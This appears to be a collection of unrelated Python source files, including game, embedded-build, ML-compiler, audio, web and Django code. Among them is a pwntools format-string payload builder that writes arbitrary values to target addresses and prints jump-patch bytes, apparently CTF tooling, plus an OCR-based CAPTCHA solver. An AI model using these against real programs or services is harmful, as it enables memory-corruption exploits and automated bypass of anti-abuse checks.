NoColisionables = pg.sprite.Group()
Nivel = Mapa('untitledmap.json')
Nivel.Mapeo(Colisionables, NoColisionables)
Running = True
while Running:
for event in pg.event.get():
if event.type == pg.QUIT:
Running = False
if event.type == pg.KEYDOWN:
if event.key == pg.K_ESCAPE:
Running = False
Colisionables.draw(Pantalla)
NoColisionables.draw(Pantalla)
|
import requests
import os
import filecmp
#the following is needed, because at this stage PLATFORMIO_HOME_DIR is undefined
from os.path import expanduser
home = expanduser("~")
if os.name == 'nt': # Windows
basePath = home + '\.platformio'
else:
basePath = home + '/.platformio'
patchPath = basePath + '/packages/framework-mbed/targets/TARGET_NXP/TARGET_LPC11U6X/device/TOOLCHAIN_GCC_ARM/TARGET_LPC11U68/'
#get the latest startup files from github
print("Comparing startup_LPC11U68.cpp to PokittoLib repository...")
url = 'https://raw.githubusercontent.com/pokitto/PokittoIO/master/src/hal/LPC11U68/mbed_patches/arm_gcc/startup_LPC11U68.cpp'
r = requests.get(url, allow_redirects=True, headers={'Cache-Control': 'no-cache'})
open(patchPath + 'startup_LPC11U68.tmp', 'wb').write(r.content)
#check if startup_LPC11U68.bak exists
if not (os.path.exists(patchPath + 'startup_LPC11U68.bak')):
#first run, so create a backup
print('Creating backup of original startup_LPC11U68.cpp')
os.rename(patchPath + 'startup_LPC11U68.cpp', patchPath + 'startup_LPC11U68.bak')
#compare new .tmp file(s) to existing files
if (os.path.exists(patchPath + 'startup_LPC11U68.cpp')):
if not filecmp.cmp(patchPath + 'startup_LPC11U68.tmp', patchPath + 'startup_LPC11U68.cpp'):
#they are different, so update
print('New version found. Saving it as startup_LPC11U68.cpp')
open(patchPath + 'startup_LPC11U68.cpp', 'wb').write(r.content)
else:
#missing completely, so save
print('Saving startup_LPC11U68.cpp')
open(patchPath + 'startup_LPC11U68.cpp', 'wb').write(r.content)
#delete temporary file(s)
if (os.path.exists(patchPath + 'startup_LPC11U68.tmp')):
os.remove(patchPath+'startup_LPC11U68.tmp')
#get the latest linker file from github
print("Comparing linker file LPC11U68.ld to PokittoLib repository...")
url = 'https://raw.githubusercontent.com/pokitto/PokittoIO/master/src/hal/LPC11U68/mbed_patches/arm_gcc/LPC11U68.ld'
r = requests.get(url, allow_redirects=True, headers={'Cache-Control': 'no-cache'})
open(patchPath + 'LPC11U68.tmp', 'wb').write(r.content)
#check if LPC11U68.bak exists
if not (os.path.exists(patchPath + 'LPC11U68.bak')):
#first run, so create a backup
if (os.path.exists(patchPath + 'LPC11U68.ld')):
print('Creating backup of original LPC11U68.ld')
os.rename(patchPath + 'LPC11U68.ld', patchPath + 'LPC11U68.bak')
#compare new .tmp file(s) to existing files
if (os.path.exists(patchPath + 'LPC11U68.ld')):
if not filecmp.cmp(patchPath + 'LPC11U68.tmp', patchPath + 'LPC11U68.ld'):
#they are different, so update
print('New version found. Saving it as LPC11U68.ld')
open(patchPath + 'LPC11U68.ld', 'wb').write(r.content)
else:
#missing completely, so save
print('Saving LPC11U68.ld')
open(patchPath + 'LPC11U68.ld', 'wb').write(r.content)
#delete temporary file(s)
if (os.path.exists(patchPath + 'LPC11U68.tmp')):
os.remove(patchPath+'LPC11U68.tmp') |
from tvm import te
from tvm.topi.utils import get_stages_and_cfgs
from .libxsmm_intrin import intrin_libxsmm_brgemm
from .schedule_utils import get_layer_cfg
def schedule_conv_conv_fused_nchwc(cfg, outs):
outs = [outs] if isinstance(outs, te.tensor.Tensor) else outs
s = te.create_schedule([x.op for x in outs])
stage_dict, layer_output_dict, _, _, post_ops, hasPaddedInput = get_stages_and_cfgs(s, outs)
inputs_cfg, filters_cfg, outputs_cfg = get_layer_cfg()
######## Searchable parameters
# -------------------- res_3x
output_step_tile_size_h = 1
output_step_tile_size_w = 28
step_num_h = 28
step_num_w = 2
output_tile_0_h = 14
output_tile_0_w = 2
c_split2 = 4
reduce_split1 = 2
reduce_split2 = 2
# -------------------- conv3_conv3_test_tiny
# output_step_tile_size_h = 1
# output_step_tile_size_w = 8
# step_num_h = 2
# step_num_w = 2
# output_tile_0_h = 2
# output_tile_0_w = 1
# c_split2 = 4
# reduce_split1 = 2
# reduce_split2 = 2
# --------------------
output_tile_size_h = output_step_tile_size_h * step_num_h
output_tile_size_w = output_step_tile_size_w * step_num_w
# --------------------
######## Global output
n, oc_chunk, h, w, oc = s[layer_output_dict['Layer_1']].op.axis
oc_chunk_o, oc_chunk_i_1 = s[layer_output_dict['Layer_1']].split(oc_chunk, factor=c_split2)
ht, wt, h, w = s[layer_output_dict['Layer_1']].tile(h, w, x_factor=output_tile_size_h, y_factor=output_tile_size_w)
s[layer_output_dict['Layer_1']].reorder(n, oc_chunk_o, ht, wt, oc_chunk_i_1, h, w, oc)
fused_blx = s[layer_output_dict['Layer_1']].fuse(n, oc_chunk_o, ht, wt)
s[layer_output_dict['Layer_1']].parallel(fused_blx)
if post_ops[1]:
s[layer_output_dict['Layer_1']].vectorize(oc)
s[stage_dict['Output_1']].compute_at(s[layer_output_dict['Layer_1']], fused_blx)
_, oc_chunk_i_1, h, w, oc = s[stage_dict['Output_1']].op.axis
if post_ops[1] != 'bias':
s[stage_dict['Output_1_BiasAdd']].compute_inline()
ho_1, wo_1, h, w = s[stage_dict['Output_1']].tile(h, w, x_factor=output_step_tile_size_h, y_factor=output_step_tile_size_w)
ic_chunk, ry, rx, ic = s[stage_dict['Output_1']].op.reduce_axis
ic_chunk_o_1, ic_chunk_i = s[stage_dict['Output_1']].split(ic_chunk, factor=reduce_split2)
s[stage_dict['Output_1']].reorder(oc_chunk_i_1, ic_chunk_o_1, ho_1, wo_1, h, ic_chunk_i, ry, rx, w, oc, ic)
if (((filters_cfg['Layer_1'].H == 1 and filters_cfg['Layer_1'].W == 1 and \
filters_cfg['Layer_1'].stride_h == 1 and filters_cfg['Layer_1'].stride_w == 1)) and \
(step_num_h > 1 and output_step_tile_size_w == outputs_cfg['Layer_1'].W)): # HM > 1 & WI = OW (small W)
# print('small: bind to h')
tensorize_axis = h
block_output_height = output_step_tile_size_h
else:
# print('big: bind to ic_chunk_i')
tensorize_axis = ic_chunk_i
block_output_height = 1
libxsmm_tensorize = intrin_libxsmm_brgemm(
ic.dom.extent, # k of brgemm -> ic
oc.dom.extent, # n of brgemm -> oc
output_step_tile_size_w, # m of brgemm -> w
filters_cfg['Layer_1'].W, # -> rx
filters_cfg['Layer_1'].H, # -> ry
reduce_split2, # -> ic_chunk_i
block_output_height, # -> hi
filters_cfg['Layer_1'].stride_h,
filters_cfg['Layer_1'].stride_w,
inputs_cfg['Layer_1'].C)
s[stage_dict['Output_1']].tensorize(tensorize_axis, libxsmm_tensorize)
######## Intermediate output
if hasPaddedInput[1]:
s[stage_dict['FusedConv2D_PaddedInput_1']].compute_at(s[stage_dict['Output_1']], fused_blx)
s[layer_output_dict['Layer_0']].compute_at(s[stage_dict['Output_1']], fused_blx)
if hasPaddedInput[0]:
s[stage_dict['FusedConv2D_PaddedInput_0']].compute_at(s[stage_dict['Output_1']], fused_blx)
n, oc_chunk, h, w, oc = s[layer_output_dict['Layer_0']].op.axis
if post_ops[0]:
s[layer_output_dict['Layer_0']].vectorize(oc)
s[stage_dict['Output_0']].compute_at(s[stage_dict['Output_1']], wo_1)
_, oc_chunk, h, w, oc = s[stage_dict['Output_0']].op.axis
if post_ops[0] != 'bias':
s[stage_dict['Output_0_BiasAdd']].compute_inline()
ho, wo, h, w = s[stage_dict['Output_0']].tile(h, w, x_factor=output_tile_0_h, y_factor=output_tile_0_w)
ic_chunk, ry, rx, ic = s[stage_dict['Output_0']].op.reduce_axis
ic_chunk_o, ic_chunk_i = s[stage_dict['Output_0']].split(ic_chunk, factor=reduce_split1)
s[stage_dict['Output_0']].reorder(oc_chunk, ic_chunk_o, ho, wo, h, ic_chunk_i, ry, rx, w, oc, ic)
# TODO: Deal with this. Currently assuming the first layer is never 1x1
if (((filters_cfg['Layer_0'].H == 1 and filters_cfg['Layer_0'].W == 1 and \
filters_cfg['Layer_0'].stride_h == 1 and filters_cfg['Layer_0'].stride_w == 1)) and \
(step_num_h > 1 and output_step_tile_size_w == outputs_cfg['Layer_0'].W)): # HM > 1 & WI = OW (small W)
# print('small: bind to h')
tensorize_axis = h
block_output_height = output_step_tile_size_h
else:
# print('big: bind to ic_chunk_i')
tensorize_axis = ic_chunk_i
block_output_height = 1
libxsmm_tensorize = intrin_libxsmm_brgemm(
ic.dom.extent, # k of brgemm -> ic
oc.dom.extent, # n of brgemm -> oc
output_tile_0_w, # m of brgemm -> w
filters_cfg['Layer_0'].W, # -> rx
filters_cfg['Layer_0'].H, # -> ry
reduce_split1, # -> ic_chunk_i
block_output_height, # -> hi
filters_cfg['Layer_0'].stride_h,
filters_cfg['Layer_0'].stride_w,
inputs_cfg['Layer_0'].C)
s[stage_dict['Output_0']].tensorize(tensorize_axis, libxsmm_tensorize)
s = s.normalize()
return s
|
TASK_NAME = 'TaggingTask'
JS_ASSETS = ['']
JS_ASSETS_OUTPUT = 'scripts/vulyk-tagging.js'
JS_ASSETS_FILTERS = 'rjsmin'
CSS_ASSETS = ['']
CSS_ASSETS_OUTPUT = 'styles/vulyk-tagging.css'
CSS_ASSETS_FILTERS = 'cssmin'
|
import crea as stm
import sys
_shared_cread_instance = None
def get_config_node_list():
from creabase.storage import configStorage
nodes = configStorage.get('nodes', None)
if nodes:
return nodes.split(',')
def shared_cread_instance():
""" This method will initialize _shared_cread_instance and return it.
The purpose of this method is to have offer single default Crea
instance that can be reused by multiple classes. """
global _shared_cread_instance
if not _shared_cread_instance:
if sys.version >= '3.0':
_shared_cread_instance = stm.cread.Cread(
nodes=get_config_node_list())
else:
_shared_cread_instance = stm.Cread(
nodes=get_config_node_list())
return _shared_cread_instance
def set_shared_cread_instance(cread_instance):
""" This method allows us to override default Crea instance for all
users of _shared_cread_instance. """
global _shared_cread_instance
_shared_cread_instance = cread_instance
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
# Version 1.0
# Author: WildfootW
# GitHub: github.com/WildfootW
# Copyleft (C) 2020 WildfootW All rights reversed.
#
from pwn import *
class Error(Exception):
"""
Base class for exceptions in this module.
"""
pass
class LengthError(Error):
"""
Exception raised for your "P_index_forepart_payload_len" is too short for the payload.
"""
def __init__(self, message):
self.message = message
class format_s:
value_now = 0
payload_string = b""
def start(self):
self.value_now = 0
self.payload_string = b""
return self
def ljust(self, size, byte = b'W'):
if len(self.payload_string) > size: # ljust is too short
print()
raise LengthError("ljust size " + str(size) + " is too short for payload length " + str(len(self.payload_string)) + " now.")
self.value_now += size - len(self.payload_string)
self.payload_string = self.payload_string.ljust(size, byte)
return self
def append(self, append_s):
self.value_now += len(append_s)
self.payload_string += append_s
return self
def get(self):
return self.payload_string
def s(self, parameter_index):
self.append((b"%%%d$s" % parameter_index))
return self
def hhn(self, write_value, parameter_index):
b = 0x100
delta_value = ((write_value - self.value_now) % b + b) % b
if delta_value == 0:
self.payload_string += b"%%%d$hhn" % (parameter_index)
else:
self.payload_string += b"%%%dc%%%d$hhn" % (delta_value, parameter_index)
self.value_now += delta_value
return self
def hn(self, write_value, parameter_index):
b = 0x10000
delta_value = ((write_value - self.value_now) % b + b) % b
if delta_value == 0:
self.payload_string += b"%%%d$hn" % (parameter_index)
else:
self.payload_string += b"%%%dc%%%d$hn" % (delta_value, parameter_index)
self.value_now += delta_value
return self
class auto_format_s(format_s):
# 00000000 25 37 30 63 25 31 36 24 68 68 6e 25 31 39 32 63 │%70c│%16$│hhn%│192c│
# 00000010 25 31 37 24 68 68 6e 25 35 38 63 25 31 38 24 68 │%17$│hhn%│58c%│18$h│
# 00000020 68 6e 25 31 39 32 63 25 31 39 24 68 68 6e 25 32 │hn%1│92c%│19$h│hn%2│
# 00000030 30 24 68 68 6e 25 32 31 24 68 68 6e 25 32 32 24 │0$hh│n%21│$hhn│%22$│
# 00000040 68 68 6e 25 32 33 24 68 68 6e 41 41 41 41 41 41 │hhn%│23$h│hnAA│AAAA│
# 00000050 18 10 60 00 00 00 00 00 19 10 60 00 00 00 00 00 │··`·│····│··`·│····│
# 00000060 1a 10 60 00 00 00 00 00 1b 10 60 00 00 00 00 00 │··`·│····│··`·│····│
# 00000070 1c 10 60 00 00 00 00 00 1d 10 60 00 00 00 00 00 │··`·│····│··`·│····│
# 00000080 1e 10 60 00 00 00 00 00 1f 10 60 00 00 00 00 00 │··`·│····│··`·│····│
# in this case P_index_forepart_payload_len = 10
P_index_begin = 0 # the paramenter index which point to this payload
P_index_forepart_payload_len = 0 # guess how many bytes you need
P_index_now = 0 # how many address have been expected will be saved at the end of payload
operating_address_size = 0 # usually 8 bytes(x64) or 4 bytes(x86)
def start(self, operating_address_size = 8, P_index_forepart_payload_len = 1, begin_paramenter = 6):
format_s.start(self)
self.P_index_forepart_payload_len = P_index_forepart_payload_len
self.P_index_begin = begin_paramenter
self.operating_address_size = operating_address_size
self.P_index_now = 0
return self
def auto_get_P(self, increase_P_index_now = True):
ret = self.P_index_now + self.P_index_forepart_payload_len + self.P_index_begin
if increase_P_index_now:
self.P_index_now += 1
return ret
def auto_hhn(self, write_value, times):
for i in range(times):
self.hhn(write_value >> (i * 8) & 0xff, self.auto_get_P())
return self
def auto_hn(self, write_value, times):
for i in range(times):
self.hn(write_value >> (i * 16) & 0xffff, self.auto_get_P())
return self
def auto_s(self):
self.s(self.auto_get_P())
return self
def auto_ljust(self, byte = b'W'):
self.ljust(self.P_index_forepart_payload_len * self.operating_address_size, byte)
return self
def print_patch(asm_code, byte_amount = 0):
print(" patch for asm : ".center(60, "="))
print(asm_code)
asm_hexcode = asm(asm_code).hex()
for i in range(byte_amount):
asm_hexcode += "90"
asm_hexcode_fix = ""
for i in range(len(asm_hexcode) // 4):
asm_hexcode_fix += asm_hexcode[i * 4:i * 4 + 4]
asm_hexcode_fix += " "
if len(asm_hexcode) % 4:
asm_hexcode_fix += asm_hexcode[-2:]
print(asm_hexcode_fix)
print("\n or\n")
asm_hexcode_fix = asm_hexcode[:2] + " "
asm_hexcode = asm_hexcode[2:]
for i in range(len(asm_hexcode) // 4):
asm_hexcode_fix += asm_hexcode[i * 4:i * 4 + 4]
asm_hexcode_fix += " "
if len(asm_hexcode) % 4:
asm_hexcode_fix += asm_hexcode[-2:]
print(asm_hexcode_fix)
print("".center(60, "="))
fmt = format_s()
if __name__ == "__main__":
def print_payload(payload):
log.warning("payload: " + str(payload))
log.warning("payload length: " + str(len(payload)))
print("\n")
log.info("Test format_s()")
# usage
target_address = 0x60106c
write_value = 0xfaceb00c
payload = fmt.start().hhn(0xda, 8).ljust(16, b"A").append(p64(target_address)).get()
print_payload(payload)
payload = fmt.start().hhn(0xfa, 12).hhn(0xce, 13).hhn(0xb0, 14).hhn(0x0c, 15).ljust((12 - 6) * 8, b"A").append(p64(target_address)).append(p64(target_address + 0x1)).append(p64(target_address + 0x2)).append(p64(target_address + 0x3)).get()
print_payload(payload)
log.info("Test auto_format_s()")
#start(self, operating_address_size = 8, P_index_forepart_payload_len = 1, begin_paramenter = 6):
fmt = auto_format_s()
fmt.start(operating_address_size = 8,P_index_forepart_payload_len = 19)
fmt.auto_hhn(write_value, 8).auto_s().auto_hn(write_value, 8).auto_ljust()
payload = fmt.get()
print_payload(payload)
asm_code = """
mov eax, 0x4007eb
jmp eax
"""
print_patch(asm_code, 5)
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from mwptoolkit.module.Graph import gcn,graph_module |
import base64
import random
import re
import string
import cv2
import numpy as np
import pytesseract
class CaptchaDecode:
def decode_response(self, response):
image_b64 = response["result"]["image"]
image_data = self.decode_b64(image_b64)
path = self.generate_random_name()
self.write_data_image(image_data, path)
return self.decrypt(path), path
def decode_path(self, path):
return self.decrypt(path)
@staticmethod
def generate_random_name():
return (
"captcha/" +
"".join([random.choice(string.ascii_letters)
for _ in range(10)]) + ".jpg")
@staticmethod
def write_data_image(data, path):
with open(path, "wb") as f:
f.write(data)
@staticmethod
def decode_b64(data):
return base64.b64decode(data)
@staticmethod
def decrypt(path):
try:
frame = cv2.imread(path)
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, np.array([30, 120, 0]),
np.array([255, 255, 255]))
text = pytesseract.image_to_string(
mask,
config=f'--psm 8 tessedit_char_whitelist={string.ascii_letters + string.digits}'
)
text = re.sub("[^A-Za-z0-9]", "", text)
except Exception as e:
print(e)
return ''
return text
|
"""
author : abhishek goswami
abhishekg785@gmail.com
audio.py module
simply handles all the i/o operations related to the audio
such as user audio input and output
"""
import pyaudio # handles the record and play of the audio files
import audioop # lib for handling math operations on the audio file
import wave
import tempfile
import pyttsx
from stt import STTHandler
class AudioHandler:
def __init__(self):
print 'Cons of the AudioHandler Invoked'
self._audio = pyaudio.PyAudio()
self.STTHandler = STTHandler()
def fetchThreshold(self):
THRESHOLD_MULTIPLIER = 1.8
RATE = 16000
CHUNK = 1024
# no of seconds to allow to establish threshold
THRESHOLD_TIME = 1
# recording system
stream = self._audio.open(
format = pyaudio.paInt16,
channels = 1,
rate = RATE,
input = True,
frames_per_buffer = CHUNK
)
# stores the audio data
frames = []
# stores the lastN score values
lastN = [i for i in range(20)]
# calculate the long ,run and average and thereby the proper threshold
for i in range(0, RATE / CHUNK * THRESHOLD_TIME):
data = stream.read(CHUNK)
frames.append(data)
# saves this data point as a source
lastN.pop(0)
lastN.append(self.getAudioRMS(data))
average = sum(lastN) / len(lastN)
print lastN
stream.stop_stream()
stream.close()
# this will be set as a limit to cause the disturbance to be over
THRESHOLD = average * THRESHOLD_MULTIPLIER
return THRESHOLD
def invokeListener(self, KEYWORD):
""" Will be used to activate our system to listen for the commands
when the user says something, in our case it will be a keyword.
I will be using 'Hiro' keyword for the moment :P
:param KEYWORD: The keyword through which the system will get a activated or starts listening for the commands
"""
THRESHOLD_MULTIPLIER = 1.8 # will be used to check is user has said something or not
# pyaudio parameters
RATE = 16000
CHUNK = 1024
LISTEN_TIME = 10 # No of seconds to listen before forcing restart
THRESHOLD_TIME = 1
stream = self._audio.open(
format = pyaudio.paInt16,
channels = 1,
rate = RATE,
input = True,
frames_per_buffer = CHUNK
)
# storing the audio data
frames = []
lastN = [i for i in range(30)]
for i in range(0, RATE / CHUNK * THRESHOLD_TIME):
print 'for the threshold time'
data = stream.read(CHUNK)
frames.append(data)
lastN.pop(0)
lastN.append(self.getAudioRMS(data))
average = sum(lastN) / len(lastN)
print lastN
THRESHOLD = average * THRESHOLD_MULTIPLIER
frames = []
isDisturbance = False
for i in range(0, RATE / CHUNK * LISTEN_TIME):
print 'for the listen time'
data = stream.read(CHUNK)
frames.append(data)
score = self.getAudioRMS(data)
print 'score' + str(score)
print 'thresh' + str(THRESHOLD)
if score > THRESHOLD:
isDisturbance = True
print "Disturbance detected !"
break
if not isDisturbance:
print "No Disturbance detected"
stream.stop_stream()
stream.close()
return (None, None)
frames = frames[-20:]
DELAY_MULTIPLIER = 1
for i in range(0, RATE / CHUNK * DELAY_MULTIPLIER):
print 'for the the extra time'
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
# temporary file storage and finding the text in the audio file usig wit.ai cool!
with tempfile.NamedTemporaryFile(mode='w+b') as f:
wav_fp = wave.open(f, 'wb')
wav_fp.setnchannels(1)
wav_fp.setsampwidth(pyaudio.get_sample_size(pyaudio.paInt16))
wav_fp.setframerate(RATE)
wav_fp.writeframes(''.join(frames))
wav_fp.close()
f.seek(0)
text = self.STTHandler.extractTextFromSpeech(f)
print text
text = str(text['_text'])
text = text.split(' ')
if any(KEYWORD in word for word in text):
return (THRESHOLD, KEYWORD)
return (False, text)
def getAudioRMS(self, data):
"""Measure of the power in an audio signal
:param data: chunk data of the audio file
:return: calculated score
"""
rms = audioop.rms(data, 2)
score = rms / 3
return score
def getUserAudioInput(self, THRESHOLD = None, LISTEN = True):
"""Listens for the user audio input command
Records until a seecond of silence or times out after 12 seconds
Returns the first matching string or None
:param THRESHOLD: The limit over which the disturbance occurs
:param LISTEN: to listen or not
:return: Speech converted to text using STTHandler module
"""
text = self.getAllActiveInput(THRESHOLD, LISTEN)
return text
def getAllActiveInput(self, THRESHOLD = None, LISTEN = True):
"""Record the user audio input and times out after 12 seconds
Returns a list of matching options or None
:param THRESHOLD: The limit over which the disturbance occurs
:param LISTEN: to listen or not
:return: Speech converted to text using STTHandler module
"""
RATE = 16000
CHUNK = 1024
LISTEN_TIME = 12
# check if no threshold is provided
if THRESHOLD is None:
THRESHOLD = self.fetchThreshold();
# play some audio here to indicate that our system has started listening bro :)
self.speak('Give your command')
# recodring stream
stream = self._audio.open(
format = pyaudio.paInt16,
channels = 1,
rate = RATE,
input = True,
frames_per_buffer = CHUNK
)
frames = []
lastN = [THRESHOLD * 1.2 for i in range(30)]
for i in range(0, RATE / CHUNK * LISTEN_TIME):
print 'LISTENING FOR COMMANDS'
data = stream.read(CHUNK)
frames.append(data)
score = self.getAudioRMS(data)
lastN.pop(0)
lastN.append(score)
average = sum(lastN) / float(len(lastN))
print 'average %f', average
print 'threshold %f', THRESHOLD * 0.8
if(average < THRESHOLD * 0.8):
break
print lastN
# play another sound here to indicate that it has listened
self.speak('Processing your request!')
stream.stop_stream()
stream.close()
with tempfile.SpooledTemporaryFile(mode='w+b') as f:
wav_fp = wave.open(f, 'wb')
wav_fp.setnchannels(1)
wav_fp.setsampwidth(pyaudio.get_sample_size(pyaudio.paInt16))
wav_fp.setframerate(RATE)
wav_fp.writeframes(''.join(frames))
wav_fp.close()
f.seek(0)
text = self.STTHandler.extractTextFromSpeech(f)
print text
return text['_text']
def speak(self, phrase):
"""converts the given text or phrase to the speech
:param phrase: The text to be converted into speech
"""
tts = pyttsx.init()
tts.say(str(phrase))
tts.runAndWait()
|
#!/usr/bin/python3
from string import Template
from bottle import route, run, request, redirect, HTTPError
import FigClasses as fc_
import HTML_Templates as ht_
#####=====----- Variables -----=====#####
#####=====----- Classes -----=====#####
#####=====----- Functions -----=====#####
@route('/')
def server_root():
return ht_.HEADER + ht_.FORM_INI + ht_.FOOTER
@route('/figure', method='POST')
def figure():
input_encoding = 'utf-8'
suburl_ = '/' + str(request.forms.get('figtype'))
redirect('/figure' + suburl_)
@route('/figure/<class_>')
def figure_class(class_):
if class_ == 'Quadro':
new_form_ = ht_.FORM_QUADRO
if class_ == 'Cone':
new_form_ = ht_.FORM_CONE
if class_ == 'Circle':
new_form_ = ht_.FORM_CIRCLE
if class_ == 'Cube':
new_form_ = ht_.FORM_CUBE
if class_ == 'Parallelepiped':
new_form_ = ht_.FORM_PARALLELEPIPED
if class_ == 'Pyramid3F':
new_form_ = ht_.FORM_PYRAMID3F
if class_ == 'Pyramid4F':
new_form_ = ht_.FORM_PYRAMID4F
if class_ == 'Rectangle':
new_form_ = ht_.FORM_RECTANGLE
if class_ == 'Rhombus':
new_form_ = ht_.FORM_RHOMBUS
if class_ == 'Sphere':
new_form_ = ht_.FORM_SPHERE
if class_ == 'Trapezoid':
new_form_ = ht_.FORM_TRAPEZOID
if class_ == 'Triangle':
new_form_ = ht_.FORM_TRIANGLE
if class_ == 'Cylinder':
new_form_ = ht_.FORM_CYLINDER
return ht_.HEADER + new_form_ + ht_.FOOTER
@route('/result', method='POST')
def result(**kwargs):
return ht_.HEADER + ht_.FOOTER
#####=====----- MAIN -----=====#####
if __name__ == '__main__':
run(host='127.0.0.1', port=8080, debug=True)
#####=====----- THE END -----=====######################################## |
from django.forms import ModelForm
from .models.order import Order
from .models.comment import Comment
from .models.personorder import PersonOrder
from .models.person import Person
from django import forms
import re
from django.utils.translation import gettext_lazy as _
from datetime import date
from dateutil.relativedelta import relativedelta
# deprecate
class PersonForm(forms.Form):
email = forms.EmailField(max_length=100)
firstname = forms.CharField(max_length=100, required=False)
lastname = forms.CharField(max_length=100, required=False)
class CommentForm(ModelForm):
class Meta:
model = Comment
fields = ['text']
class OrderSimpleForm(ModelForm):
head_email = forms.EmailField(max_length=100, label='Email')
head_institute = forms.CharField(max_length=300, required=False, label='Institute')
head_firstname = forms.CharField(max_length=100, required=True, label='Firstname')
head_lastname = forms.CharField(max_length=100, required=True, label='Lastname')
tech_email = forms.EmailField(max_length=100, required=False, label='Email')
tech_institute = forms.CharField(max_length=300, required=False, label='Institute')
tech_firstname = forms.CharField(max_length=100, required=False, label='Firstname')
tech_lastname = forms.CharField(max_length=100, required=False, label='Lastname')
owner_email = forms.EmailField(max_length=100, label='Email')
owner_institute = forms.CharField(max_length=300, required=False, label='Institute')
owner_firstname = forms.CharField(max_length=100, required=False, label='Firstname')
owner_lastname = forms.CharField(max_length=100, required=False, label='Lastname')
end_date = forms.DateField(
widget=forms.DateInput(format='%d.%m.%Y'),
input_formats=['%d.%m.%Y'],
label=_('End of the project'),
help_text=_('The latest possible date is in 3 years')
)
class Meta:
model = Order
# fields = ['project_name', 'abstract', 'notes', 'end_date', 'capacity', 'directory_name', 'protocol_ssh', 'protocol_sftp', 'protocol_cifs', 'protocol_nfs', 'nfs_network',
# 'owner_name', 'group_name', 'group_permission', 'group_cifsacls', 'headPersonEmail', 'headPersonFirstname', 'headPersonLastname']
exclude = ['state', 'create_date', 'modify_date', 'persons']
def __init__(self, owner=None, *args, **kwargs):
if kwargs.get('instance'):
initial = kwargs.setdefault('initial', {})
owner_person = kwargs['instance'].owner()
if owner_person is None:
owner_person = owner
if owner_person is not None:
initial['owner_email'] = owner_person.email
initial['owner_institute'] = owner_person.institute
initial['owner_firstname'] = owner_person.first_name
initial['owner_lastname'] = owner_person.last_name
head_person = kwargs['instance'].head()
if head_person is None:
head_person = owner
if head_person is not None:
initial['head_email'] = head_person.email
initial['head_institute'] = head_person.institute
initial['head_firstname'] = head_person.first_name
initial['head_lastname'] = head_person.last_name
tech_person = kwargs['instance'].tech()
if tech_person is not None:
initial['tech_email'] = tech_person.email
initial['tech_institute'] = tech_person.institute
initial['tech_firstname'] = tech_person.first_name
initial['tech_lastname'] = tech_person.last_name
initial['end_date'] = date.today() + relativedelta(years=+3)
ModelForm.__init__(self, *args, **kwargs)
self.fields['owner_email'].disabled = True
self.fields['owner_institute'].disabled = True
self.fields['owner_firstname'].disabled = True
self.fields['owner_lastname'].disabled = True
def save(self, commit=True):
order = super(OrderSimpleForm, self).save()
self._create_person_order(order, PersonOrder.ROLE_OWNER, 'owner')
self._create_person_order(order, PersonOrder.ROLE_HEAD, 'head')
self._create_person_order(order, PersonOrder.ROLE_TECH, 'tech')
return order
def clean(self):
cleaned_data = super().clean()
protocol_nfs = cleaned_data.get("protocol_nfs")
nfs_network = cleaned_data.get("nfs_network")
if protocol_nfs and not nfs_network:
error = forms.ValidationError("Must fill NFS Client networks when choosing NFS V3.")
self.add_error('nfs_network', error)
raise error
if cleaned_data.get("end_date") > date.today() + relativedelta(years=+3):
self.add_error('end_date', "End date should be less than 3 years in the future")
if not re.match("^[^\s]+$", cleaned_data.get("group_name")):
self.add_error('group_name', "Group name should not have spaces")
if not re.match("^[^\s]+$", cleaned_data.get("owner_name")):
self.add_error('owner_name', "Owner name should not have spaces")
if not re.match("^[a-zA-Z0-9_-]+$", cleaned_data.get("directory_name")):
self.add_error('directory_name', "Allowed characters are \"a-z 0-9 _ -\"")
def _create_person_order(self, order, role, prefix):
person_email = self.cleaned_data.get(prefix + '_email')
if person_email.strip():
try:
person = Person.objects.get(username=person_email)
except Person.DoesNotExist:
try:
person = Person.objects.get(email=person_email)
except Person.DoesNotExist:
person = Person()
person.email = person_email
person.username = person_email
person.set_unusable_password()
person.first_name = self.cleaned_data.get(prefix + '_firstname')
person.institute = self.cleaned_data.get(prefix + '_institute')
person.last_name = self.cleaned_data.get(prefix + '_lastname')
person.save()
try:
PersonOrder.objects.get(person=person, order=order, role=role)
except PersonOrder.DoesNotExist:
try:
PersonOrder.objects.filter(order=order, role=role).delete()
finally:
PersonOrder.objects.create(person=person, order=order, role=role)
class OrderAdminForm(OrderSimpleForm):
class Meta:
model = Order
exclude = ['create_date', 'modify_date', 'persons']
class OrderEditForm(OrderSimpleForm):
def __init__(self, *args, **kwargs):
super(OrderEditForm, self).__init__(*args, **kwargs)
self.fields['project_name'].disabled = True
self.fields['abstract'].disabled = True
self.fields['notes'].disabled = True
self.fields['end_date'].disabled = True
self.fields['capacity'].disabled = True
self.fields['directory_name'].disabled = True
self.fields['protocol_cifs'].disabled = True
self.fields['protocol_nfs'].disabled = True
self.fields['nfs_network'].disabled = True
self.fields['owner_name'].disabled = True
self.fields['group_name'].disabled = True
self.fields['group_permission'].disabled = True
self.fields['group_cifsacls'].disabled = True |
import matplotlib.pyplot as plt
import numpy as np
import urllib
import matplotlib.dates as mdates
def graph_data(stock):
stock_price_url = 'http://chartapi.finance.yahoo.com/instrument/1.0/'+stock+'/chartdata;type=quote;range=99y/csv'
source_code = urllib.request.urlopen(stock_price_url).read().decode()
stock_data = []
split_source = source_code.split('\n')
for line in split_source:
split_line = line.split(',')
if len(split_line) == 6:
if 'values' not in line:
stock_data.append(line)
date, closep, highp, lowp, openp, volume = np.loadtxt(stock_data,
delimiter=',',
unpack=True,
# %Y = full year. 2015
# %y = partial year 15
# %m = number month
# %d = number day
# %H = hours
# %M = minutes
# %S = seconds
# 12-06-2014
# %m-%d-%Y
converters={})
return date, closep
date, close = graph_data('AAPL')
print(date)
|
import csv
from django.core.management.base import BaseCommand
from grid.models import Element, Grid, GridPackage, Feature
from package.models import Project
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('filename', type=str)
def handle(self, *args, **kwargs):
filename = kwargs['filename']
grid = Grid.objects.create(**{
'title': 'test grid',
'slug': 'testgrid',
'description': 'test',
'is_draft': False,
'is_locked': False,
'header': True,
})
with open('/app/grid/cvs_fixtures/{}'.format(filename)) as csvDataFile:
